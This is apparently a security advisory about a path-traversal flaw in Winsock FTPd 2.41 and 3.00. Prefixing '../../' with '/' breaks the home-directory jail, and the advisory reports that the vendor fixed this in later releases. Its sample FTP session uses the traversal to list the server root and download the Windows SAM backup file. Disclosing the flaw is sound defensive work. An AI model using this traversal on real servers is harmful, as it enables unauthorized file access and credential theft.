COMMAND

    Winsock FTPD

SYSTEMS AFFECTED

    Winsock FTPD 2.41/3.00 (Pro)

PROBLEM

    'Interstellar Overdrive' found following.  Winsock FTPd is  common
    popular ftp server for windows95/98/3.11/NT/2K, by Texas  Imperial
    Software it  is simple,  inexpensive, and  easy to  set ftp server
    for windows machines, current release is v3.0.

    In  Winsock  ftpd,  there  is  an  option called "Restrict to home
    directory and below" where the server makes a chroot jail for  the
    user.  Lets take an example:

        c:>ftp target.com
        Connected to target.com
        User (target.com:(none)): io
        331 Give me your password, please
        Password: XXXXXX
        230 Logged in successfully
        ftp>pwd
        257 "/" is current directory     #io's directory here c:\wftpd\io
               #and it is chroot'ed
        ftp>ls
        200 PORT command okay
        150 File Listing Follows in ASCII mode.
        my_file.txt
        my_code.c
        226 Transfer finished successfully.
        11 Bytes received in 0.01 seconds (1.10 Kbytes/sec)
        ftp>cd ../../
        501 User is not allowed to change to ../../ - returning to /.
        ftp>
        #until now chroot jail working fine...
        
        #hmmm, lets try doing 'cd /../../'
        ftp>cd /../../
        250 "/../.." is current directory
        ftp>ls
        200 PORT command okay
        150 File Listing Follows in ASCII mode.
        wftpd
        inetpub
        DOS
        WINA20.386
        CONFIG.DOS
        CONFIG.SYS
        WINNT
        AUTOEXEC.BAT
        Program Files
        TEMP
        COMMAND.COM
        .....etc # cool !
        #even more fun
        ftp>cd /../../WINNT/repair/
        250 "/../../WINNT/repair/" is current directory
        ftp>get /../../WINNT/repair/sam._
        200 PORT command okay.......etc we got the file...

    The problem is that the chroot  jail only works if the user  tried
    ../../../ not  /../../../, by  simply adding  a "/"  before ../../
    (which is  a common  known bug  in win32  applications) any  local
    user or even  anonymous user can  change his working  directory to
    any directory on  the server, having  the ability to  download any
    file  from  the  server(as  you  saw  above).  In other words, the
    chroot jail is broken.

    Vulnerable Winsock FTPd applications found:

        - Winsock FTPd v2.41 RC14
        - Winsock FTPd v2.41 RC14 Pro
        - Winsock FTPd v3.00 Pro

SOLUTION

    Vendor contacted, a  new release of  Wftpd is out  which fixes the
    problem: Wftpd v2.41 RC15 and Wftpd v3.00 R2.